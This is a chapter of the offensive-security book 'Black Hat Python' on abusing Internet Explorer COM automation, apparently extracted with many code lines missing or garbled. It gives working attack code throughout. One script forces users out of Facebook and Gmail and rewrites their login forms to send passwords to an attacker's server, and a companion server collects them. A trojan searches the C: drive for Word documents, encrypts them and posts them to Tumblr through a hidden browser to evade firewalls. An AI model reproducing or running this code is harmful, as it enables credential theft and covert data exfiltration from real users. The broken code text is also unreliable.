Black Hat Python: Python Programming for Hackers and Pentesters (2014)

Chapter 9. Fun with Internet Explorer

Windows COM automation serves a number of practical uses, from interacting with network-based services to embedding a Microsoft Excel spreadsheet into your own application. All versions of Windows from XP forward allow you to embed an Internet Explorer COM object into applications, and we’ll take advantage of this ability in this chapter. Using the native IE automation object, we’ll create a man-in-the browser-style attack where we can steal credentials from a website while a user is interacting with it. We’ll make this credential-stealing attack extendable, so that several target websites can be harvested. The last step will use Internet Explorer as a means to exfiltrate data from a target system. We’ll include some public key crypto to protect the exfiltrated data so that only we can decrypt it.

Internet Explorer, you say? Even though other browsers like Google Chrome and Mozilla Firefox are more popular these days, most corporate environments still use Internet Explorer as their default browser. And of course, you can’t remove Internet Explorer from a Windows system — so this technique should always be available to your Windows trojan.

Man-in-the-Browser (Kind Of)

Man-in-the-browser (MitB) attacks have been around since the turn of the new millennium. They are a variation on the classic man-in-the-middle attack. Instead of acting in the middle of a communication, malware installs itself and steals credentials or sensitive information from the unsuspecting target’s browser. Most of these malware strains (typically called Browser Helper Objects) insert themselves into the browser or otherwise inject code so that they can manipulate the browser process itself. As browser developers become wise to these techniques and antivirus vendors increasingly look for this behavior, we have to get a bit sneakier. By leveraging the native COM interface to Internet Explorer, we can control any IE session in order to get credentials for social networking sites or email logins. You can of course extend this logic to change a user’s password or perform transactions with their logged-in session. Depending on your target, you can also use this technique in conjunction with your keylogger module in order to force them to re-authenticate to a site while you capture the keystrokes.

We’ll begin by creating a simple example that will watch for a user browsing Facebook or Gmail, de-authenticate them, and then modify the login form to send their username and password to an HTTP server that we control. Our HTTP server will then simply redirect them back to the real login page.

If you’ve ever done any JavaScript development, you’ll notice that the COM model for interacting with IE is very similar. We are picking on Facebook and Gmail because corporate users have a nasty habit of both reusing passwords and using these services for business (particularly, forwarding work mail to Gmail, using Facebook chat with coworkers, and so on). Let’s crack open and enter the following code:

  import win32com.client

  import time

  import urlparse

  import urllib

➊ data_receiver = "http://localhost:8080/"

➋ target_sites  = {}

      target_sites[""] =

          {"logout_url"      : None,

           "logout_form"     : "logout_form",

           "login_form_index": 0,

           "owned"           : False}

      target_sites[""]    =

          {"logout_url"       : "



           "logout_form"      : None,

           "login_form_index" : 0,

           "owned"            : False}

      # use the same target for multiple Gmail domains

      target_sites[""] = target_sites[""]

      target_sites[""] = target_sites[""]


    ➌ windows = win32com.client.Dispatch(clsid)

These are the makings of our man-(kind-of)-in-the-browser attack. We define our data_receiver ➊ variable as the web server that will receive the credentials from our target sites. This method is riskier in that a wily user might see the redirect happen, so as a future homework project you could think of ways of pulling cookies or pushing the stored credentials through the DOM via an image tag or other means that look less suspicious. We then set up a dictionary of target sites ➋ that our attack will support. The dictionary members are as follows: logout_url is a URL we can redirect via a GET request to force a user to log out; the logout_form is a DOM element that we can submit that forces the logout; login_form_index is the relative location in the target domain’s DOM that contains the login form we’ll modify; and the owned flag tells us if we have already captured credentials from a target site because we don’t want to keep forcing them to log in repeatedly or else the target might suspect something is up. We then use Internet Explorer’s class ID and instantiate the COM object ➌, which gives us access to all tabs and instances of Internet Explorer that are currently running.

Now that we have the support structure in place, let’s create the main loop of our attack:

  while True:

➊     for browser in windows:

          url = urlparse.urlparse(browser.LocationUrl)

➋         if url.hostname in target_sites:

➌             if target_sites[url.hostname]["owned"]:


              # if there is a URL, we can just redirect

➍             if target_sites[url.hostname]["logout_url"]:




                  # retrieve all elements in the document

➎                 full_doc = browser.Document.all

                  # iterate, looking for the logout form

                  for i in full_doc:


                      # find the logout form and submit it

➏                     if == target_sites[url.hostname]["logout_form"]:





          # now we modify the login form


              login_index = target_sites[url.hostname]["login_form_index"]

              login_page = urllib.quote(browser.LocationUrl)

➐             browser.Document.forms[login_index].action = "%s%s" % (data_.

              receiver, login_page)

              target_sites[url.hostname]["owned"] = True




This is our primary loop where we monitor our target’s browser session for the sites from which we want to nab credentials. We start by iterating through all currently running Internet Explorer ➊ objects; this includes active tabs in modern IE. If we discover that the target is visiting one of our predefined sites ➋ we can begin the main logic of our attack. The first step is to determine whether we have executed an attack against this site already ➌; if so, we won’t execute it again. (This has a downside in that if the user didn’t enter their password correctly, you can miss their credentials; I’ll leave our simplified solution as a homework assignment to improve upon.)

We then test to see if the target site has a simple logout URL that we can redirect to ➍ and if so, we force the browser to do so. If the target site (such as Facebook) requires the user to submit a form to force the logout, we begin iterating over the DOM ➎ and when we discover the HTML element ID that is registered to the logout form ➏, we force the form to be submitted. After the user has been redirected to the login form, we modify the endpoint of the form to post the username and password to a server that we control ➐, and then wait for the user to perform a login. Notice that we tack the hostname of our target site onto the end of the URL of our HTTP server that collects the credentials. This is so our HTTP server knows what site to redirect the browser to after collecting the credentials.

You’ll notice the function wait_for_browser referenced in a few spots above, which is a simple function that waits for a browser to complete an operation such as navigating to a new page or waiting for a page to load fully. Let’s add this functionality now by inserting the following code above the main loop of our script:

def wait_for_browser(browser):

    # wait for the browser to finish loading a page

    while browser.ReadyState != 4 and browser.ReadyState != "complete":



Pretty simple. We are just looking for the DOM to be fully loaded before allowing the rest of our script to keep executing. This allows us to carefully time any DOM modifications or parsing operations.

Creating the Server

Now that we’ve set up our attack script, let’s create a very simple HTTP server to collect the credentials as they’re submitted. Crack open a new file called and drop in the following code:

  import SimpleHTTPServer

  import SocketServer

  import urllib

  class CredRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):

      def do_POST(self):

➊         content_length = int(self.headers['Content-Length'])

➋         creds ='utf-8')

➌         print creds

➍         site = self.path[1:]


➎         self.send_header('Location',urllib.unquote(site))


➏ server = SocketServer.TCPServer(('', 8080), CredRequestHandler)


This simple snippet of code is our specially designed HTTP server. We initialize the base TCPServer class with the IP, port, and CredRequestHandler class ➏ that will be responsible for handling the HTTP POST requests. When our server receives a request from the target’s browser, we read the Content-Length header ➊ to determine the size of the request, and then we read in the contents of the request ➋ and print them out ➌. We then parse out the originating site (Facebook, Gmail, etc.) ➍and force the target browser to redirect ➎ back to the main page of the target site. An additional feature you could add here is to send yourself an email every time credentials are received so that you can attempt to log in using the target’s credentials before they have a chance to change their password. Let’s take it for a spin.

Kicking the Tires

Fire up a new IE instance and run your and scripts in separate windows. You can test browsing around to various websites first to make sure that you aren’t seeing any odd behavior, which you shouldn’t. Now browse to Facebook or Gmail and attempt to log in. In window, you should see something like the following, using Facebook as an example:

C:\> python.exe



localhost - - [12/Mar/2014 00:03:50] "POST / HTTP/1.1" 301 -

You can clearly see the credentials arriving, and the redirect by the server kicking the browser back to the main login screen. Of course, you can also perform a test where you have Internet Explorer running and you’re already logged in to Facebook; then try running your script and you can see how it forces the logout. Now that we can nab the user’s credentials in this manner, let’s see how we can spawn IE to help exfiltrate information from a target network.

IE COM Automation for Exfiltration

Gaining access to a target network is only a part of the battle. To make use of your access, you want to be able to exfiltrate documents, spreadsheets, or other bits of data off the target system. Depending on the defense mechanisms in place, this last part of your attack can prove to be tricky. There might be local or remote systems (or a combination of both) that work to validate processes opening remote connections, as well as whether those processes should be able to send information or initiate connections outside of the internal network. A fellow Canadian security researcher, Karim Nathoo, pointed out that IE COM automation has the wonderful benefit of using the Iexplore.exe process, which is typically trusted and whitelisted, to exfiltrate information out of a network.

We’ll create a Python script that will first hunt for Microsoft Word documents on the local filesystem. When a document is encountered, the script will encrypt it using public key cryptography.[20] After the document is encrypted, we’ll automate the process of posting the encrypted document to a blog on This will enable us to dead-drop the document and retrieve it when we want to without anyone else being able to decrypt it. By using a trusted site like Tumblr, we should also be able to bypass any blacklisting that a firewall or proxy may have, which might otherwise prevent us from just sending the document to an IP address or web server that we control. Let’s start by putting some supporting functions into our exfiltration script. Open up and enter the following code:

import win32com.client

import os

import fnmatch

import time

import random

import zlib

from Crypto.PublicKey import RSA

from Crypto.Cipher import PKCS1_OAEP

doc_type   = ".doc"

username   = ""

password   = "justinBHP2014"

public_key = ""

def wait_for_browser(browser):

    # wait for the browser to finish loading a page

    while browser.ReadyState != 4 and browser.ReadyState != "complete":



We are only creating our imports, the document types that we will search for, our Tumblr username and password, and a placeholder for our public key, which we’ll generate later on. Now let’s add our encryption routines so that we can encrypt the filename and file contents.

  def encrypt_string(plaintext):

      chunk_size = 256

      print "Compressing: %d bytes" % len(plaintext)

➊     plaintext = zlib.compress(plaintext)

      print "Encrypting %d bytes" % len(plaintext)

➋     rsakey = RSA.importKey(public_key)

      rsakey =

      encrypted = " "

      offset    = 0

➌     while offset < len(plaintext):

          chunk = plaintext[offset:offset+chunk_size]

➍         if len(chunk) % chunk_size != 0:

              chunk += " " * (chunk_size - len(chunk))

          encrypted += rsakey.encrypt(chunk)

          offset    += chunk_size

➎     encrypted = encrypted.encode("base64")

      print "Base64 encoded crypto: %d" % len(encrypted)

      return encrypted

 def encrypt_post(filename):

     # open and read the fil e

     fd = open(filename,"rb")

     contents =


➏    encrypted_title = encrypt_string(filename)

     encrypted_body  = encrypt_string(contents)

     return encrypted_title,encrypted_body

Our encrypt_post function is responsible for taking in the filename and returning both the encrypted filename and the encrypted file contents in base64-encoded format. We first call the main workhorse function encrypt_string ➏, passing in the filename of our target file which will become the title of our blog post on Tumblr. The first step of our encrypt_string function is to apply zlib compression on the file ➊ before setting up our RSA public key encryption object ➋ using our generated public key. We then begin looping through the file contents ➌ and encrypting it in 256-byte chunks, which is the maximum size for RSA encryption using PyCrypto. When we encounter the last chunk of the file ➍, if it is not 256 bytes long, we pad it with spaces to ensure that we can successfully encrypt it and decrypt it on the other side. After we build our entire ciphertext string, we base64-encode it ➎ before returning it. We use base64 encoding so that we can post it to our Tumblr blog without problems or weird encoding issues.

Now that we have our encryption routines set up, let’s begin adding in the logic to deal with logging in and navigating the Tumblr dashboard. Unfortunately, there is no quick and easy way of finding UI elements on the Web: I simply spent 30 minutes using Google Chrome and its developer tools to inspect each HTML element that I needed to interact with.

It is also worth noting that through Tumblr’s settings page, I turned the editing mode to plaintext, which disables their pesky JavaScript-based editor. If you wish to use a different service, then you too will have to figure out the precise timing, DOM interactions, and HTML elements that are required — luckily, Python makes the automation piece very easy. Let’s add some more code!

➊ def random_sleep():



  def login_to_tumblr(ie):

      # retrieve all elements in the document

➋     full_doc = ie.Document.all

      # iterate looking for the login form

      for i in full_doc:

➌         if == "signup_email":


          elif == "signup_password":



      # you can be presented with different home pages

➍     if ie.Document.forms[0].id == "signup_form":




      except IndexError, e:



      # the login form is the second form on the page



We create a simple function called random_sleep ➊ that will sleep for a random period of time; this is designed to allow the browser to execute tasks that might not register events with the DOM to signal that they are complete. It also makes the browser appear to be a bit more human. Ourlogin_to_tumblr function begins by retrieving all elements in the DOM ➋, and looks for the email and password fields ➌ and sets them to the credentials we provide (don’t forget to sign up an account). Tumblr can present a slightly different login screen with each visit, so the next bit of code ➍ simply tries to find the login form and submit it accordingly. After this code executes, we should now be logged into the Tumblr dashboard and ready to post some information. Let’s add that code now.

  def post_to_tumblr(ie,title,post):

      full_doc = ie.Document.all

      for i in full_doc:

          if == "post_one":


              title_box = i


          elif == "post_two":


              print "Set text area"


          elif == "create_post":

              print "Found post button"

              post_form = i


      # move focus away from the main content box


➊     title_box.focus()


      # post the form





None of this code should look very new at this point. We are simply hunting through the DOM to find where to post the title and body of the blog posting. The post_to_tumblr function only receives an instance of the browser and the encrypted filename and file contents to post. One little trick (learned by observing in Chrome developer tools) ➊ is that we have to shift focus away from the main content part of the post so that Tumblr’s JavaScript enables the Post button. These subtle little tricks are important to jot down as you apply this technique to other sites. Now that we can log in and post to Tumblr, let’s put the finishing touches in place for our script.

  def exfiltrate(document_path):

➊     ie = win32com.client.Dispatch("InternetExplorer.Application")

➋     ie.Visible = 1

      # head to tumblr and login



      print "Logging in..."


      print "Logged in...navigating"



      # encrypt the file

      title,body = encrypt_post(document_path)

      print "Creating new post..."


      print "Posted!"

      # destroy the IE instance

➌     ie.Quit()

      ie = None


  # main loop for document discovery

  # NOTE: no tab for first line of code below

➍ for parent, directories, filenames in os.walk("C:\\"):

      for filename in fnmatch.filter(filenames,"*%s" % doc_type):

          document_path = os.path.join(parent,filename)

          print "Found: %s" % document_path



Our exfiltrate function is what we will call for every document that we want to store on Tumblr. It first creates a new instance of the Internet Explorer COM object ➊— and the neat thing is that you can set the process to be visible or not ➋. For debugging, leave it set to 1, but for maximum stealth you definitely want to set it to 0. This is really useful if, for example, your trojan detects other activity going on; in that case, you can start exfiltrating documents, which might help to further blend your activities in with that of the user. After we call all of our helper functions, we simply kill our IE instance ➌ and return. The last bit of our script ➍ is responsible for crawling through the C:\ drive on the target system and attempting to match our preset file extension (.doc in this case). Each time a file is found, we simply pass the full path of the file off to our exfiltratefunction.

Now that we have our main code ready to go, we need to create a quick and dirty RSA key generation script, as well as a decryption script that we can use to paste in a chunk of encrypted Tumblr text and retrieve the plaintext. Let’s start by opening and entering the following code:

from Crypto.PublicKey import RSA

new_key = RSA.generate(2048, e=65537)

public_key = new_key.publickey().exportKey("PEM")

private_key = new_key.exportKey("PEM")

print public_key

print private_key

That’s right — Python is so bad-ass that we can do it in a handful of lines of code. This block of code outputs both a private and public key pair. Copy the public key into your script. Then open a new Python file called and enter the following code (paste the private key into the private_key variable):

  import zlib

  import base64

  from Crypto.PublicKey import RSA

  from Crypto.Cipher import PKCS1_OAEP

  private_key = "###PASTE PRIVATE KEY HERE###"

➊ rsakey = RSA.importKey(private_key)

  rsakey =

  chunk_size= 256

  offset = 0

  decrypted = ""

➋ encrypted = base64.b64decode(encrypted)

  while offset < len(encrypted):

➌     decrypted += rsakey.decrypt(encrypted[offset:offset+chunk_size])

      offset += chunk_size

  # now we decompress to original

➍ plaintext = zlib.decompress(decrypted)

  print plaintext

Perfect! We simply instantiate our RSA class with the private key ➊ and then shortly thereafter we base64-decode ➋ our encoded blob from Tumblr. Much like our encoding loop, we simply grab 256-byte chunks ➌ and decrypt them, slowly building up our original plaintext string. The final step ➍ is to decompress the payload, because we previously compressed it on the other side.

Kicking the Tires

There are a lot of moving parts to this piece of code, but it is quite easy to use. Simply run your script from a Windows host and wait for it to indicate that it has successfully posted to Tumblr. If you left Internet Explorer visible, you should have been able to watch the whole process. After it’s complete, you should be able to browse to your Tumblr page and see something like Figure 9-1.

Our encrypted filename

Figure 9-1. Our encrypted filename

As you can see, there is a big encrypted blob, which is the name of our file. If you scroll down, you will clearly see that the title ends where the font is no longer bold. If you copy and paste the title into your file and run it, you should see something like this:

#:> python

C:\Program Files\Debugging Tools for Windows (x86)\dml.doc


Perfect! My script picked up a document from the Windows Debugging Tools directory, uploaded the contents to Tumblr, and I can successfully decrypt the file name. Now of course to do the entire contents of the file, you would want to automate it using the tricks I showed you inChapter 5 (using urllib2 and HTMLParser), which I will leave as a homework assignment for you. The other thing to consider is that in our script, we pad the last 256 bytes with the space character, and this might break certain file formats. Another idea for extending the project is to encrypt a length field at the beginning of the blog post contents that tells you the original size of the document before you padded it. You can then read in this length after decrypting the blog post contents and trim the file to that exact size.

[20The Python package PyCrypto can be installed from